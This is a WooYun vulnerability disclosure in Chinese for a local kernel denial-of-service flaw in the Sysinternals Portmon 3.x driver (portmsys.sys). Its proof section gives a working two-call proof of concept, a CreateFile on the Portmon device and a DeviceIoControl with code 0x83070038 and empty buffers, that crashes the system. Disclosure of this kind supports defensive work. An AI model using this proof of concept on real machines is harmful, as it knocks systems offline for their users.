当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028275

漏洞标题:Sysinternals Portmon 3.x 本地内核拒绝服务漏洞

相关厂商:微软

漏洞作者: 某熊

提交时间:2013-07-09 11:55

修复时间:2013-07-09 11:55

公开时间:2013-07-09 11:55

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:4

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Sysinternals Portmon 工具的驱动部分在处理 IoControl 时未检查从用户态传来的参数,错误的 IoControl 请求可导致系统崩溃。

详细说明:

Portmon 工具会安装 portmsys.sys 驱动程序实现其基本功能。
该驱动程序在处理来自用户态的 IoControl 时,对参数的合法性缺乏检测(未检查InputBufferLength),导致用户态传入的 InputBufferLength 和 OutputBufferLength 均为0时,特定的 IoControl 会使驱动试图引用无效的指针,导致系统崩溃。
如图:

portmon_poc.jpg


漏洞证明:

hDevice = CreateFile("\\.\Portmon",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
0,
0);
DeviceIoControl(hDevice, 0x83070038, 0, 0, 0, 0, &t, 0);

修复方案:

验证

版权声明:转载请注明来源 某熊@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝